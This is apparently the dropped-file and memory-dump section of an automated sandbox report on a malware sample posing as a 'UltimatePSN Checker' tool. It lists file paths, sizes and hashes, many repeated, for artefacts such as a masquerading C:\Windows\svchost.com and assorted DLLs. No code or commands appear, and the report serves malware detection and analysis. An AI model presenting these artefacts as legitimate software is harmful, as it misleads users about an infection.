C:\Users\Admin\AppData\Local\Temp\UltimatePSN Checker v1.2 Updated\._cache_UltimatePSN Checker v1.2.exe
Filesize
966KB

MD5
015784204915c9b7b3ddb1eb32515500

SHA1
7a7c0621be31c80aff9811899deb91f8c59159e8

SHA256
2bb8ed8810b034d5d6f75db091545ced89beb89f61d467157f2b54b751e175b9

SHA512
07d050d3baa7e37000b19e755e7269191aebc22c89d1e9475df0ea9be7df951280dbab4da6ea2855686401d50c448a9098f0afc4e1745905c495d3ee0e7502d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f1pt4p4q.rbz.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fb84fb200c\1682257062.temp
Filesize
2KB

MD5
a947a520b92afd0f6f68d7b3d7e16dee

SHA1
ad9c0d4dceceb8aef47e11783ca909e111385be1

SHA256
db7bf127d1c49aaa93ffc924456c775be606e15f8aac1c32262ad901314699c7

SHA512
59fa3609e8d05c08db612ec3835524f5fde24ca21bc7967d3d5a0c751a0acdecbb078b4d9263893f8a8c2b0e0e666ab1c20e2c4195e74b31055888786789cdc2

Download Submit
C:\Users\Admin\Link\License.key
Filesize
16B

MD5
b3d5b1f874c2678836852e6e9e2fa1e9

SHA1
e75d359e9cd8d6bf0fcfe075ce10b88fd3f512e6

SHA256
898adce9cba3a765bfabb050eb41122ec843ba3db8e57c7056b0345d35331276

SHA512
8355468a06286bac7ec7141d9612370c47ecc1ef612277f1943351b85d934c8abc1966ed2d114102a338e0ba2a21850e309e5aa349ce0c0c67f49d81d1072296

Download Submit
C:\Users\Admin\Link\License.key
Filesize
16B

MD5
b3d5b1f874c2678836852e6e9e2fa1e9

SHA1
e75d359e9cd8d6bf0fcfe075ce10b88fd3f512e6

SHA256
898adce9cba3a765bfabb050eb41122ec843ba3db8e57c7056b0345d35331276

SHA512
8355468a06286bac7ec7141d9612370c47ecc1ef612277f1943351b85d934c8abc1966ed2d114102a338e0ba2a21850e309e5aa349ce0c0c67f49d81d1072296

Download Submit
C:\Users\Admin\Link\config.png
Filesize
1KB

MD5
aa9afcaaff477897c5cde9f8a1a4b587

SHA1
a432280bafb9645fb6c22352af315fe600c26003

SHA256
766e6344bb1adafeb3c3ae8ac82e9b944d793025e454a5ac4447d8e787ea9ec9

SHA512
acb2ddd512fc7842261fb367a4df8f6c1ddb48cc7a39f41b6b08d2daf53f74402ba645e2a92d0100a10566c6c1afcda3c75db2a345c3deb9fbf4b6bbb9d36d86

Download Submit
C:\Users\Admin\Link\config.png
Filesize
1KB

MD5
aa9afcaaff477897c5cde9f8a1a4b587

SHA1
a432280bafb9645fb6c22352af315fe600c26003

SHA256
766e6344bb1adafeb3c3ae8ac82e9b944d793025e454a5ac4447d8e787ea9ec9

SHA512
acb2ddd512fc7842261fb367a4df8f6c1ddb48cc7a39f41b6b08d2daf53f74402ba645e2a92d0100a10566c6c1afcda3c75db2a345c3deb9fbf4b6bbb9d36d86

Download Submit
C:\Users\Admin\Link\icon.png
Filesize
40KB

MD5
73a72358e646f72990cbe96c886a4152

SHA1
bf63163365af0e34bd4b6a97470bf54f68200b1e

SHA256
7fe930ecfae5983b1dc2faceaa6479222a20b3f7d3dbcee224e146f66a57b775

SHA512
4743385c1391b51807c6b025e4f04fbae96c00d787a5baeb1fbfc5d8bb95b95ca2ab77667b0949138492d86178a37f0d0f5070095c577f86cfba74fe04c851af

Download Submit
C:\Users\Admin\Link\icon.png
Filesize
40KB

MD5
73a72358e646f72990cbe96c886a4152

SHA1
bf63163365af0e34bd4b6a97470bf54f68200b1e

SHA256
7fe930ecfae5983b1dc2faceaa6479222a20b3f7d3dbcee224e146f66a57b775

SHA512
4743385c1391b51807c6b025e4f04fbae96c00d787a5baeb1fbfc5d8bb95b95ca2ab77667b0949138492d86178a37f0d0f5070095c577f86cfba74fe04c851af

Download Submit
C:\Users\Admin\Link\input.dll
Filesize
9KB

MD5
bb4375a2e6e7ac57f856ad2486c84e5d

SHA1
96b90aa330f6590fe1683f893cc3beb1d51d7659

SHA256
cb3af594effe41e6779fe8af1f6f30c3efbe0271d8d42c5259c99ef3484ed635

SHA512
73969159674a5437d7142cb2a2a2db72b1f9d759a3a310f417c1cbe3b2783698ee8bbc841a8219ec43f22dd3e44b53069491bedfcf595b909db4eeec2941255c

Download Submit
C:\Users\Admin\Link\input.dll
Filesize
9KB

MD5
bb4375a2e6e7ac57f856ad2486c84e5d

SHA1
96b90aa330f6590fe1683f893cc3beb1d51d7659

SHA256
cb3af594effe41e6779fe8af1f6f30c3efbe0271d8d42c5259c99ef3484ed635

SHA512
73969159674a5437d7142cb2a2a2db72b1f9d759a3a310f417c1cbe3b2783698ee8bbc841a8219ec43f22dd3e44b53069491bedfcf595b909db4eeec2941255c

Download Submit
C:\Users\Admin\Link\input.dll
Filesize
9KB

MD5
bb4375a2e6e7ac57f856ad2486c84e5d

SHA1
96b90aa330f6590fe1683f893cc3beb1d51d7659

SHA256
cb3af594effe41e6779fe8af1f6f30c3efbe0271d8d42c5259c99ef3484ed635

SHA512
73969159674a5437d7142cb2a2a2db72b1f9d759a3a310f417c1cbe3b2783698ee8bbc841a8219ec43f22dd3e44b53069491bedfcf595b909db4eeec2941255c

Download Submit
C:\Users\Admin\Link\launcher.bat
Filesize
32B

MD5
3c46b0c109ce0cc49ef3169ad7626765

SHA1
74280a65a35f7d6c4ed75737d0dce6408d785289

SHA256
fc661643deed5d72a7e4db692e07a2593264183f11c3bb97a8312200d42a4d92

SHA512
ca1f26f3b70f086bb3f14bef665e97a76b5d4657487ed662a5b6dacb98d13a7b37127eab5f1f2d13b194dca1cdcbe58ff587392a455feb0c0f3bbabd89603674

Download Submit
C:\Users\Admin\Link\launcher.bat
Filesize
32B

MD5
3c46b0c109ce0cc49ef3169ad7626765

SHA1
74280a65a35f7d6c4ed75737d0dce6408d785289

SHA256
fc661643deed5d72a7e4db692e07a2593264183f11c3bb97a8312200d42a4d92

SHA512
ca1f26f3b70f086bb3f14bef665e97a76b5d4657487ed662a5b6dacb98d13a7b37127eab5f1f2d13b194dca1cdcbe58ff587392a455feb0c0f3bbabd89603674

Download Submit
C:\Users\Admin\Link\playstation.cer
Filesize
12.9MB

MD5
199291e246aacb45dbad7bfe296066fa

SHA1
1b8727331c02190d860e26f4a74156e5d1196012

SHA256
b78cfa136bc15eb5cd403a4751202b56035d360438481147d87df90f7e33f65c

SHA512
75f37558ae706e07b73b1e4c9af73068697141107a6adcd84c55500c20cce3fb6ca2be74ce58c5ce4886c58fd9d79b8fab7a18756ee7bdece250a43dfc42939f

Download Submit
C:\Users\Admin\Link\playstation.cer
Filesize
12.9MB

MD5
199291e246aacb45dbad7bfe296066fa

SHA1
1b8727331c02190d860e26f4a74156e5d1196012

SHA256
b78cfa136bc15eb5cd403a4751202b56035d360438481147d87df90f7e33f65c

SHA512
75f37558ae706e07b73b1e4c9af73068697141107a6adcd84c55500c20cce3fb6ca2be74ce58c5ce4886c58fd9d79b8fab7a18756ee7bdece250a43dfc42939f

Download Submit
C:\Users\Admin\Link\playstation.cer
Filesize
12.9MB

MD5
199291e246aacb45dbad7bfe296066fa

SHA1
1b8727331c02190d860e26f4a74156e5d1196012

SHA256
b78cfa136bc15eb5cd403a4751202b56035d360438481147d87df90f7e33f65c

SHA512
75f37558ae706e07b73b1e4c9af73068697141107a6adcd84c55500c20cce3fb6ca2be74ce58c5ce4886c58fd9d79b8fab7a18756ee7bdece250a43dfc42939f

Download Submit
C:\Users\Admin\Link\settings.json
Filesize
345B

MD5
29553ed8ec7041f0096ba99c9ecb9d02

SHA1
abdb7af88d1662e8e8cf00420ebfd68acf033b3b

SHA256
f7401198f07713e63dc0ed78f3f43dabb46b17a0b441843882785d4006f685ee

SHA512
464adc591f39bcd7e61be972e55844bb0ca805e0fba7e018eb88e15ead53f9daac068903a19adf4da65ed6150fb8b3db44427d441b0eac9084eb7a9b2e5a62ef

Download Submit
C:\Users\Admin\Link\settings.json
Filesize
345B

MD5
29553ed8ec7041f0096ba99c9ecb9d02

SHA1
abdb7af88d1662e8e8cf00420ebfd68acf033b3b

SHA256
f7401198f07713e63dc0ed78f3f43dabb46b17a0b441843882785d4006f685ee

SHA512
464adc591f39bcd7e61be972e55844bb0ca805e0fba7e018eb88e15ead53f9daac068903a19adf4da65ed6150fb8b3db44427d441b0eac9084eb7a9b2e5a62ef

Download Submit
C:\Users\Admin\Link\setup.dll
Filesize
3KB

MD5
9becb95c6a58f9449d0bb342a604558b

SHA1
eaa4e1204855e597fd65830abc05b92cd138288e

SHA256
61bc90ac939540b83b1cc72ff300e95dca11458df1329cde6c11d809b97e0485

SHA512
fffdbdaabd7b4fae457c3f461c124e57a83ae4bbc070d76d7a2d7c10d5104d53406784dbb4aa9708e80d58bd19d4d2269be2656c4fa367694f5c8d473290dfff

Download Submit
C:\Users\Admin\Link\setup.dll
Filesize
3KB

MD5
9becb95c6a58f9449d0bb342a604558b

SHA1
eaa4e1204855e597fd65830abc05b92cd138288e

SHA256
61bc90ac939540b83b1cc72ff300e95dca11458df1329cde6c11d809b97e0485

SHA512
fffdbdaabd7b4fae457c3f461c124e57a83ae4bbc070d76d7a2d7c10d5104d53406784dbb4aa9708e80d58bd19d4d2269be2656c4fa367694f5c8d473290dfff

Download Submit
C:\Users\Admin\Link\setup.dll
Filesize
3KB

MD5
9becb95c6a58f9449d0bb342a604558b

SHA1
eaa4e1204855e597fd65830abc05b92cd138288e

SHA256
61bc90ac939540b83b1cc72ff300e95dca11458df1329cde6c11d809b97e0485

SHA512
fffdbdaabd7b4fae457c3f461c124e57a83ae4bbc070d76d7a2d7c10d5104d53406784dbb4aa9708e80d58bd19d4d2269be2656c4fa367694f5c8d473290dfff

Download Submit
C:\Users\Admin\Link\st.dll
Filesize
117B

MD5
77cce38ec5e1fb1dfd444e185be33e55

SHA1
888757f1a9049ecb692283aaece2978374435904

SHA256
35153cd01cd731c2942915cdeb65cdfcfe6327ea2e3effafa60140686b9c9b94

SHA512
59ecd6cacc7cab448e80c10bb2a0e2cbbdae8cc8535ab6cd9afc3d9731be556ede54ad2ab31cdf6724f238bbbfce9fb43b4567dc153ebca66f9d3fa371b1e46d

Download Submit
C:\Users\Admin\Link\st.dll
Filesize
117B

MD5
77cce38ec5e1fb1dfd444e185be33e55

SHA1
888757f1a9049ecb692283aaece2978374435904

SHA256
35153cd01cd731c2942915cdeb65cdfcfe6327ea2e3effafa60140686b9c9b94

SHA512
59ecd6cacc7cab448e80c10bb2a0e2cbbdae8cc8535ab6cd9afc3d9731be556ede54ad2ab31cdf6724f238bbbfce9fb43b4567dc153ebca66f9d3fa371b1e46d

Download Submit
C:\Users\Admin\Link\st.dll
Filesize
117B

MD5
77cce38ec5e1fb1dfd444e185be33e55

SHA1
888757f1a9049ecb692283aaece2978374435904

SHA256
35153cd01cd731c2942915cdeb65cdfcfe6327ea2e3effafa60140686b9c9b94

SHA512
59ecd6cacc7cab448e80c10bb2a0e2cbbdae8cc8535ab6cd9afc3d9731be556ede54ad2ab31cdf6724f238bbbfce9fb43b4567dc153ebca66f9d3fa371b1e46d

Download Submit
C:\Windows\svchost.com
Filesize
40KB

MD5
169402bc4a346a2f4598a03234701991

SHA1
d0d987089510ab58bd32081aabd728dcde4d297b

SHA256
176cb37ac2b33089f3d761a11ea3d488812e41ec232b283dec4fc82ef599d020

SHA512
84e0af4100b077a999157ba30354bdf768808b69de1ee0243d922600856e4eba03880ba64b84b1249322f17196e29fdee29f25e3877e0485e93e7835f265f89b

Download Submit
C:\Windows\svchost.com
Filesize
40KB

MD5
169402bc4a346a2f4598a03234701991

SHA1
d0d987089510ab58bd32081aabd728dcde4d297b

SHA256
176cb37ac2b33089f3d761a11ea3d488812e41ec232b283dec4fc82ef599d020

SHA512
84e0af4100b077a999157ba30354bdf768808b69de1ee0243d922600856e4eba03880ba64b84b1249322f17196e29fdee29f25e3877e0485e93e7835f265f89b

Download Submit
C:\odt\OFFICE~1.EXE
Filesize
5.1MB

MD5
02c3d242fe142b0eabec69211b34bc55

SHA1
ea0a4a6d6078b362f7b3a4ad1505ce49957dc16e

SHA256
2a1ed24be7e3859b46ec3ebc316789ead5f12055853f86a9656e04b4bb771842

SHA512
0efb08492eaaa2e923beddc21566e98fbbef3a102f9415ff310ec616f5c84fd2ba3a7025b05e01c0bdf37e5e2f64dfd845f9254a376144cc7d827e7577dbb099

Download Submit
memory/348-425-0x0000016DAD5E0000-0x0000016DAD7FC000-memory.dmp

Filesize
2.1MB

Download
memory/696-451-0x00000257A2A10000-0x00000257A2C2C000-memory.dmp

Filesize
2.1MB

Download
memory/1888-409-0x000002894CBE0000-0x000002894CBF0000-memory.dmp

Filesize
64KB

Download
memory/1888-410-0x000002894CBE0000-0x000002894CBF0000-memory.dmp

Filesize
64KB

Download
memory/1888-412-0x000002894DF20000-0x000002894E13C000-memory.dmp

Filesize
2.1MB

Download
memory/2208-427-0x0000029A848B0000-0x0000029A848C0000-memory.dmp

Filesize
64KB

Download
memory/2208-426-0x0000029A848B0000-0x0000029A848C0000-memory.dmp

Filesize
64KB

Download
memory/2208-452-0x0000029A9FC50000-0x0000029A9FE6C000-memory.dmp

Filesize
2.1MB

Download
memory/2336-566-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2336-598-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3092-565-0x0000023FFB4C0000-0x0000023FFB6DC000-memory.dmp

Filesize
2.1MB

Download
memory/3092-551-0x0000023FF9FB0000-0x0000023FF9FC0000-memory.dmp

Filesize
64KB

Download
memory/3092-562-0x0000023FF9FB0000-0x0000023FF9FC0000-memory.dmp

Filesize
64KB

Download
memory/3224-391-0x00000253960B0000-0x00000253960C0000-memory.dmp

Filesize
64KB

Download
memory/3224-328-0x0000025396060000-0x0000025396082000-memory.dmp

Filesize
136KB

Download
memory/3224-393-0x00000253960B0000-0x00000253960C0000-memory.dmp

Filesize
64KB

Download
memory/3224-392-0x00000253960B0000-0x00000253960C0000-memory.dmp

Filesize
64KB

Download
memory/3224-406-0x00000253AF650000-0x00000253AF86C000-memory.dmp

Filesize
2.1MB

Download
memory/3320-594-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3320-454-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/3420-545-0x0000000000400000-0x00000000005B4000-memory.dmp

Filesize
1.7MB

Download
memory/3420-275-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download
memory/3420-567-0x0000000000770000-0x0000000000771000-memory.dmp

Filesize
4KB

Download
memory/3420-595-0x0000000000400000-0x00000000005B4000-memory.dmp

Filesize
1.7MB

Download
memory/3600-596-0x000000001DA80000-0x000000001DA90000-memory.dmp

Filesize
64KB

Download
memory/3600-582-0x00007FF814050000-0x00007FF81419E000-memory.dmp

Filesize
1.3MB

Download
memory/3600-593-0x0000000180000000-0x00000001802F2000-memory.dmp

Filesize
2.9MB

Download
memory/3600-580-0x0000000000400000-0x0000000000BA2000-memory.dmp

Filesize
7.6MB

Download
memory/3972-293-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/4404-135-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/4404-243-0x0000000000400000-0x00000000005B4000-memory.dmp

Filesize
1.7MB

Download
memory/4984-583-0x00007FF814050000-0x00007FF81419E000-memory.dmp

Filesize
1.3MB

Download
memory/4984-571-0x00007FF7B52D0000-0x00007FF7B52E0000-memory.dmp

Filesize
64KB

Download
memory/4984-592-0x0000000180000000-0x00000001802F2000-memory.dmp

Filesize
2.9MB

Download
memory/4984-573-0x0000000180000000-0x00000001802F2000-memory.dmp

Filesize
2.9MB

Download
memory/4984-568-0x0000000000400000-0x0000000000B04000-memory.dmp

Filesize
7.0MB

Download
memory/4984-569-0x0000000000400000-0x0000000000BA2000-memory.dmp

Filesize
7.6MB

Download
memory/4984-597-0x0000000004400000-0x0000000004410000-memory.dmp

Filesize
64KB

Download